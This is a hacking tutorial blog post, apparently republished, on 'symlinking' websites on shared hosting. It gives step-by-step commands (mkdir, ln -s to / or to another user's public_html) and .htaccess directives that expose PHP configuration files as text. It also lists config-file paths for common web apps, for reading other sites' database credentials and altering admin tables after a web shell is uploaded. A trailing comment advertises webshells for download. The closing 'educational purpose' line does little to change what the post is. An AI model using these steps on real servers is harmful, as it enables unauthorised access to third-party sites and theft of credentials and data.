.gif)
Hello Guys, Today I'm going to explain how to symlink websites in two different methods.
So Lets Start!
[#] Explanation
First I will explain what symlink can do, Symlinking is making Symbolic links to other websites on the same server to read their configuration files, connect to their database, and get the information needed to get access to their Control panel.
and that's about it :)
[#] Method #1
After uploading you shell on the server make a directory with the command bellow:
mkdir sym
NOTE:- The directory can be called whatever you want, just change the "sym" to any name.
Enter your new directory then upload OR create a file called ".htaccess" in the new directory with the code bellow inside it:
Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy AnyLike this picture:
After that, we will run the command bellow to create a symlink to "/" directory:
ln -s / rootand it will look like this:
And if we opened the directory "sym" from our browser like "www.website.com/sym" it should look like this:
in the image above my shell was in /downloads so I made "sym" directory inside /downloads
and our process is almost done, now we just have to get the user of the target website.
I've provided user.php code in the bottom of the post, this script will give you all the websites on the server and their username.
when you get the username of your target, just open the link like this:
www.website.com/sym/root/home/(user)/public_html
where (user) = the user of the target
here is a picture for example:
where the user was "hillock"
now the next step is easy, we will start looking for the configuration its usually called config.php, or configuration.php. here are the location of configuration files in the most famous webapps out there.
vBulletin -- /includes/config.php IPB -- /conf_global.php MyBB -- /inc/config.php Phpbb -- /config.php Php Nuke -- /config.php Php-Fusion -- config.php SMF -- /Settings.php Joomla -- configuration.php , configuration.php-dist WordPress -- /wp-config.php Drupal -- /sites/default/settings.php Oscommerce -- /includes/configure.php e107 -- /e107_config.php Seditio -- /datas/config.php
when you find the configuration file, it will contain the database details.
it will look like the image bellow (image bellow is joomla configuration file):
now upload SQL.php (code provided bellow)
and connect to the database.
Congrats :) now you can get all the details from admin table, and even change it.
[#] Method #2
In this method, we wont symlink the root directory, we will symlink the target's public_html dir directly.
To do this, just follow those steps,
1. Make the a new directory, just like method 1
2. make ".htaccess" OR upload it with the code bellow:
Options Indexes FollowSymlinks DirectoryIndex z0mbie.htm AddType txt .php AddHandler txt .php
3. run the following comman:
ln -s /home/(user)/public_html (user)where (user) = the target's user
and it will look like this when we open it in our browser:
now you just have to find the configuration and connect :)
Scripts Needed:
User.php Source Code
SQL.php Source Code
LIKE ALWAYS ITS ONLY FOR EDUCATIONAL PURPOSE ONLY!
Source: Security Geeks
1 comments:
Hello, we provide you with variety of webshells which are asp, aspx and php web backdoors, such as b374k, c99, r57, pouya, wso etc. https://webshell.co
Post a Comment